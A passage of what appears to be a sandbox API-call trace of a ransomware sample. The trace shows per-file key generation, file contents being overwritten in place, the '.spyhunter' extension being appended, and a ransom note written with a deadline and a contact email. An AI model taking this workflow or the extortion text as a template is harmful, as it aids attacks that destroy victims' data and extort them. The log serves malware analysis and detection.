(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0149.231] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cedb0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cedb0*=0x2ac, lpOverlapped=0x0) returned 1 [0149.231] CloseHandle (hObject=0x178) returned 1 [0149.231] GetProcessHeap () returned 0x2c0000 [0149.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f61930 | out: hHeap=0x2c0000) returned 1 [0149.231] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced50 | out: pbBuffer=0x25ced50) returned 1 [0149.231] GetProcessHeap () returned 0x2c0000 [0149.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0149.231] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced48*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced48*=0x30) returned 1 [0149.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\slaWgcRtP6wne3_w\\Owcdax5DsStq.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\slawgcrtp6wne3_w\\owcdax5dsstq.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.232] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\slaWgcRtP6wne3_w\\Owcdax5DsStq.bmp") returned 94 [0149.232] StrStrW (lpFirst="Owcdax5DsStq.bmp", lpSrch=".txt") returned 0x0 [0149.232] GetProcessHeap () returned 0x2c0000 [0149.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.233] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced0c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced0c*=0x2800, lpOverlapped=0x0) returned 1 [0149.233] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.233] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced0c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ced0c*=0x2800, lpOverlapped=0x0) returned 1 [0149.234] GetProcessHeap () returned 0x2c0000 [0149.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.234] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.234] WriteFile (in: hFile=0x178, lpBuffer=0x25ced4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced0c, lpOverlapped=0x0 | out: lpBuffer=0x25ced4c*, lpNumberOfBytesWritten=0x25ced0c*=0x4, lpOverlapped=0x0) returned 1 [0149.234] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced0c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced0c*=0x30, lpOverlapped=0x0) returned 1 [0149.234] CloseHandle (hObject=0x178) returned 1 [0149.234] GetProcessHeap () returned 0x2c0000 [0149.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.234] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\slaWgcRtP6wne3_w\\Owcdax5DsStq.bmp.spyhunter") returned 104 [0149.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\slaWgcRtP6wne3_w\\Owcdax5DsStq.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\slawgcrtp6wne3_w\\owcdax5dsstq.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\slaWgcRtP6wne3_w\\Owcdax5DsStq.bmp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\slawgcrtp6wne3_w\\owcdax5dsstq.bmp.spyhunter")) returned 1 [0149.235] GetProcessHeap () returned 0x2c0000 [0149.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.236] GetProcessHeap () returned 0x2c0000 [0149.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0149.236] GetProcessHeap () returned 0x2c0000 [0149.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f61828 | out: hHeap=0x2c0000) returned 1 [0149.236] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced48 | out: pbBuffer=0x25ced48) returned 1 [0149.236] GetProcessHeap () returned 0x2c0000 [0149.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0149.236] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced40*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced40*=0x30) returned 1 [0149.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\slaWgcRtP6wne3_w\\G3lwj45svqrj.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\slawgcrtp6wne3_w\\g3lwj45svqrj.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.237] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\slaWgcRtP6wne3_w\\G3lwj45svqrj.gif") returned 94 [0149.237] StrStrW (lpFirst="G3lwj45svqrj.gif", lpSrch=".txt") returned 0x0 [0149.237] GetProcessHeap () returned 0x2c0000 [0149.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.237] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced04*=0x2800, lpOverlapped=0x0) returned 1 [0149.238] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.238] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ced04*=0x2800, lpOverlapped=0x0) returned 1 [0149.238] GetProcessHeap () returned 0x2c0000 [0149.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.238] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.238] WriteFile (in: hFile=0x178, lpBuffer=0x25ced44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced04, lpOverlapped=0x0 | out: lpBuffer=0x25ced44*, lpNumberOfBytesWritten=0x25ced04*=0x4, lpOverlapped=0x0) returned 1 [0149.238] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced04, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced04*=0x30, lpOverlapped=0x0) returned 1 [0149.238] CloseHandle (hObject=0x178) returned 1 [0149.238] GetProcessHeap () returned 0x2c0000 [0149.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.239] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\slaWgcRtP6wne3_w\\G3lwj45svqrj.gif.spyhunter") returned 104 [0149.239] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\slaWgcRtP6wne3_w\\G3lwj45svqrj.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\slawgcrtp6wne3_w\\g3lwj45svqrj.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\slaWgcRtP6wne3_w\\G3lwj45svqrj.gif.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\slawgcrtp6wne3_w\\g3lwj45svqrj.gif.spyhunter")) returned 1 [0149.239] GetProcessHeap () returned 0x2c0000 [0149.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.240] GetProcessHeap () returned 0x2c0000 [0149.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0149.240] GetProcessHeap () returned 0x2c0000 [0149.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f61720 | out: hHeap=0x2c0000) returned 1 [0149.240] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced48 | out: pbBuffer=0x25ced48) returned 1 [0149.240] GetProcessHeap () returned 0x2c0000 [0149.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0149.240] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced40*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced40*=0x30) returned 1 [0149.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\slaWgcRtP6wne3_w\\dxUTiWh li0OiJ9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\slawgcrtp6wne3_w\\dxutiwh li0oij9.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\slaWgcRtP6wne3_w\\dxUTiWh li0OiJ9.wav") returned 97 [0149.240] StrStrW (lpFirst="dxUTiWh li0OiJ9.wav", lpSrch=".txt") returned 0x0 [0149.241] GetProcessHeap () returned 0x2c0000 [0149.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.241] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced04*=0x2800, lpOverlapped=0x0) returned 1 [0149.241] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.242] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ced04*=0x2800, lpOverlapped=0x0) returned 1 [0149.242] GetProcessHeap () returned 0x2c0000 [0149.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.242] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.242] WriteFile (in: hFile=0x178, lpBuffer=0x25ced44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced04, lpOverlapped=0x0 | out: lpBuffer=0x25ced44*, lpNumberOfBytesWritten=0x25ced04*=0x4, lpOverlapped=0x0) returned 1 [0149.242] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced04, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced04*=0x30, lpOverlapped=0x0) returned 1 [0149.242] CloseHandle (hObject=0x178) returned 1 [0149.243] GetProcessHeap () returned 0x2c0000 [0149.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.243] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\slaWgcRtP6wne3_w\\dxUTiWh li0OiJ9.wav.spyhunter") returned 107 [0149.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\slaWgcRtP6wne3_w\\dxUTiWh li0OiJ9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\slawgcrtp6wne3_w\\dxutiwh li0oij9.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\slaWgcRtP6wne3_w\\dxUTiWh li0OiJ9.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\slawgcrtp6wne3_w\\dxutiwh li0oij9.wav.spyhunter")) returned 1 [0149.244] GetProcessHeap () returned 0x2c0000 [0149.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.244] GetProcessHeap () returned 0x2c0000 [0149.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0149.244] GetProcessHeap () returned 0x2c0000 [0149.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68010 | out: hHeap=0x2c0000) returned 1 [0149.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\rngdt\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\rngdt\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0149.846] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0149.846] WriteFile (in: hFile=0x9c, lpBuffer=0x25cec77*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceda0, lpOverlapped=0x0 | out: lpBuffer=0x25cec77*, lpNumberOfBytesWritten=0x25ceda0*=0x127, lpOverlapped=0x0) returned 1 [0149.864] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0149.864] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceda0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceda0*=0x2ac, lpOverlapped=0x0) returned 1 [0149.864] CloseHandle (hObject=0x9c) returned 1 [0149.865] GetProcessHeap () returned 0x2c0000 [0149.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f639a8 | out: hHeap=0x2c0000) returned 1 [0149.865] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced40 | out: pbBuffer=0x25ced40) returned 1 [0149.865] GetProcessHeap () returned 0x2c0000 [0149.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0149.865] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced38*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced38*=0x30) returned 1 [0149.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0149.865] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0149.865] StrStrW (lpFirst="Administrator.contact", lpSrch=".txt") returned 0x0 [0149.865] GetProcessHeap () returned 0x2c0000 [0149.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0149.865] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cecfc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cecfc*=0x2800, lpOverlapped=0x0) returned 1 [0149.882] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.882] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cecfc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cecfc*=0x2800, lpOverlapped=0x0) returned 1 [0149.882] GetProcessHeap () returned 0x2c0000 [0149.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0149.882] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.883] WriteFile (in: hFile=0x9c, lpBuffer=0x25ced3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cecfc, lpOverlapped=0x0 | out: lpBuffer=0x25ced3c*, lpNumberOfBytesWritten=0x25cecfc*=0x4, lpOverlapped=0x0) returned 1 [0150.042] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cecfc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cecfc*=0x30, lpOverlapped=0x0) returned 1 [0150.042] CloseHandle (hObject=0x9c) returned 1 [0150.042] GetProcessHeap () returned 0x2c0000 [0150.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0150.042] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.spyhunter") returned 74 [0150.042] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.spyhunter")) returned 1 [0150.043] GetProcessHeap () returned 0x2c0000 [0150.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0150.043] GetProcessHeap () returned 0x2c0000 [0150.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0150.043] GetProcessHeap () returned 0x2c0000 [0150.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08bc8 | out: hHeap=0x2c0000) returned 1 [0150.043] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced38 | out: pbBuffer=0x25ced38) returned 1 [0150.043] GetProcessHeap () returned 0x2c0000 [0150.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0150.043] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced30*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced30*=0x30) returned 1 [0150.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\znnK-gq8pkx4Bp.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\znnk-gq8pkx4bp.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0150.044] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\znnK-gq8pkx4Bp.avi") returned 68 [0150.044] StrStrW (lpFirst="znnK-gq8pkx4Bp.avi", lpSrch=".txt") returned 0x0 [0150.044] GetProcessHeap () returned 0x2c0000 [0150.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0150.070] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cecf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cecf4*=0x2800, lpOverlapped=0x0) returned 1 [0150.106] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.106] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cecf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cecf4*=0x2800, lpOverlapped=0x0) returned 1 [0150.107] GetProcessHeap () returned 0x2c0000 [0150.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0150.107] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.107] WriteFile (in: hFile=0x9c, lpBuffer=0x25ced34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cecf4, lpOverlapped=0x0 | out: lpBuffer=0x25ced34*, lpNumberOfBytesWritten=0x25cecf4*=0x4, lpOverlapped=0x0) returned 1 [0150.107] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cecf4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cecf4*=0x30, lpOverlapped=0x0) returned 1 [0150.107] CloseHandle (hObject=0x9c) returned 1 [0150.329] GetProcessHeap () returned 0x2c0000 [0150.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0150.329] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\znnK-gq8pkx4Bp.avi.spyhunter") returned 78 [0150.329] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\znnK-gq8pkx4Bp.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\znnk-gq8pkx4bp.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\znnK-gq8pkx4Bp.avi.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\znnk-gq8pkx4bp.avi.spyhunter")) returned 1 [0150.330] GetProcessHeap () returned 0x2c0000 [0150.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 